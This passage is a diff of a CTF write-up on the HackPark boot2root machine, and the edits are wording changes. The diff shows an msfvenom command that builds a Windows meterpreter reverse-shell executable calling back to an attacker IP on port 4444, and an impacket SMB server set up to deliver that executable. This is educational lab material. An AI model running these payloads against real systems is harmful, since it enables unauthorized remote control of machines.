PacketFire/packetfire_site/content/post/hackpark-boot2-root-writeup.md

 iis apppool\blog
 ```

-While this gave me a shell on the host, my goal became to escalate this shell to something a bit stabler.
+While this gave me a shell on the host, it was about as limited as it could be.
+My goal became to escalate this shell to something a bit stabler.
 Preferably a meterpreter shell.
-With this in mind I decided to craft a new exe reverse shell that I could catch with meterpreter.
-In conjunction, I started a listener in msfconsole on port 4444
+With this in mind I decided to craft a new executable reverse shell that I could catch with the `multi/handler`.
+I started a listener in msfconsole on port 4444 in preparation.

 ```
 root@kali:~/ctf/transfer# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.7.59 LPORT=4444 -f exe -o hello.exe
 ```

-With an exploit in hand, I decided to attempt to transfer it using impacket's smb server.
+With an exploit ready, I decided to attempt to transfer it using impacket's smb server.

 ```
 root@kali:~/ctf/transfer# impacket-smbserver -smb2support TX $PWD